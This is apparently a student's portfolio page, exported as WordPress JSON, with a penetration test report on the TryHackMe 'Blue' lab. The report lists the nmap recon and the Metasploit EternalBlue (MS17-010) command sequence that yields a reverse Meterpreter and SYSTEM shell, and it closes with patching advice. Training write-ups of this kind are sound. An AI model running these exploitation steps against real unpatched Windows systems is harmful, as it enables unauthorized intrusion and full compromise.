Full Windows box analysis chaining enumeration, exploitation, and proof of concept. Demonstrates end to end analytical workflow and technical reporting.<\/p>\n\n\n\n
# Penetration Test Report: TryHackMe Blue\n\n## 1. Objective\n\nThe goal of this engagement was to assess the security posture of the TryHackMe \u201cBlue\u201d machine by identifying exposed services, validating known vulnerabilities, and gaining controlled access to the target. The focus was MS17-010 (EternalBlue), a critical SMB remote code execution flaw found in unpatched Windows 7 systems. This report documents reconnaissance, exploitation, and proof of compromise.\n\n---\n\n## 2. Target Information\n\n**Target Host:** Blue \n**IP Address:** 10.10.201.254 \n**Operating System:** Windows 7 Professional SP1 \n**Domain:** WORKGROUP \n**Hostname:** JON-PC \n\n---\n\n## 3. Methodology\n\nThis assessment followed a simple penetration testing workflow:\n\n1. Recon \n2. Enumeration \n3. Vulnerability Identification \n4. Exploitation \n5. Post-Exploitation Validation \n\nAll actions were completed within the authorized TryHackMe environment.\n\n---\n\n## 4. Recon and Enumeration\n\n### 4.1 Nmap Scan\n\n**Command:**\n```bash\nnmap -A 10.10.201.254\n````\n\n### Scan Summary\n\nNmap identified Windows 7 Professional SP1 with several open RPC ports and SMB. SMB signing was not required. The system profile matched known EternalBlue vulnerable hosts.\n\n### Open Ports\n\n| Port | State | Service | Notes |\n| ----------- | ----- | ------------- | ----------------------- |\n| 135\/tcp | open | msrpc | Microsoft RPC |\n| 139\/tcp | open | netbios-ssn | NetBIOS session service |\n| 445\/tcp | open | microsoft-ds | SMB on Windows 7 SP1 |\n| 3389\/tcp | open | ms-wbt-server | RDP with SSL |\n| 49152-49160 | open | msrpc | High-range MSRPC ports |\n\n### Host Information Extracted\n\n* OS: Windows 7 Professional SP1\n* SMB signing: Not required\n* Domain: WORKGROUP\n* Hostname: JON-PC\n* RDP certificate valid\n* System time leaked\n\n### Vulnerability Identified\n\n**MS17-010 EternalBlue** confirmed through OS version, SMB posture, and fingerprinting.\n\n---\n\n## 5. Exploitation\n\n### 5.1 Metasploit Module\n\n**Exploit Used:**\n`exploit\/windows\/smb\/ms17_010_eternalblue`\n\n### Steps Performed\n\n1. Start Metasploit\n\n ```bash\n msfconsole\n ```\n\n2. Search and load the module\n\n ```bash\n search eternalblue\n use 0\n ```\n\n3. Select the correct target\n\n ```bash\n show targets\n set TARGET 1\n ```\n\n4. Set required options\n\n ```bash\n set RHOSTS 10.10.201.254\n set LHOST <attacker_IP>\n ```\n\n5. Run the exploit\n\n ```bash\n exploit\n ```\n\nIf the first attempt does not work, rerun it. A WIN message indicates success.\n\n### 5.2 Post-Exploitation Access\n\nOnce the exploit succeeded, Metasploit opened a Meterpreter session.\n\nTo drop to a system shell:\n\n```bash\nshell\n```\n\nSuccessful access shows:\n\n```\nC:\\Windows\\system32>\n```\n\nThis confirms full remote code execution.\n\n---\n\n## 6. Proof of Compromise\n\n* Successful EternalBlue exploitation\n* Meterpreter session established\n* System-level shell access gained\n* Direct file system interaction confirmed\n\nThis is full compromise of the target machine.\n\n---\n\n## 7. Impact Assessment\n\nCompromising MS17-010 gives an attacker the ability to:\n\n* Execute system-level code\n* Install persistence\n* Move laterally\n* Extract credentials\n* Disable defensive controls\n\nIn real environments this would be a critical threat.\n\n---\n\n## 8. Recommendations\n\n1. Apply Microsoft MS17-010 patch.\n2. Disable SMBv1 entirely.\n3. Enable SMB signing.\n4. Restrict SMB and RPC exposure at network boundaries.\n5. Upgrade unsupported operating systems like Windows 7.\n6. Implement regular vulnerability scanning and patch cycles.\n\n---\n\n## 9. Conclusion\n\nThe Blue machine is fully exploitable through the MS17-010 vulnerability. The attack path required minimal effort and resulted in complete system compromise. Proper patch management and SMB hardening would prevent this issue.\n\n---\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"Full Windows box analysis chaining enumeration, exploitation, and proof of concept. Demonstrates end to end analytical workflow and technical reporting.<\/p>\n","protected":false},"author":30346,"featured_media":0,"parent":324,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"_links":{"self":[{"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/pages\/359"}],"collection":[{"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/users\/30346"}],"replies":[{"embeddable":true,"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/comments?post=359"}],"version-history":[{"count":2,"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/pages\/359\/revisions"}],"predecessor-version":[{"id":361,"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/pages\/359\/revisions\/361"}],"up":[{"embeddable":true,"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/pages\/324"}],"wp:attachment":[{"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/media?parent=359"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}